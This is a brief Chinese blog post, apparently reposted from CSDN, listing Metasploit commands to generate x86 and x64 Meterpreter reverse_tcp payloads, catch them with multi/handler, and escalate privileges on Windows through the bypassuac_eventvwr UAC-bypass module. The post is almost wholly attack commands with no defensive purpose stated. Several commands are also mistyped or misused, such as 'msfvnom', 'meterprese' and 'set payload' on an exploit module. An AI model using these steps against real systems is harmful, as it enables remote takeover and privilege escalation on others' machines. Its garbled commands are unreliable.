转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86515785
1.查看目标主机的操作系统
a) X86操作系统
kali# msfvnom –p payload/windows/meterpreter/reverse_tcp
b) X64操作系统
kali# msfvnom –p payload/windows/x64/meterpreter/reverse_tcp
2.使用msf建立会话
msf exploit(handler) > use exploit/multi/handler
msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
3.提权
msf exploit(handler) > search bypassuac //使用bypassuac(绕过用户帐户控制)
msf exploit(handler) > set payload exploit/windows/local/bypassuac_eventvwr # 在x64使用成功
msf exploit(handler) > set payload windows/x64/meterprese/reverse_tcp
msf exploit(handler) > show targets //查看目标,可选项,根据操作系统选择
msf exploit(handler) > set target 1 #设置目标为x64,0:x86
msf exploit(handler) > exploit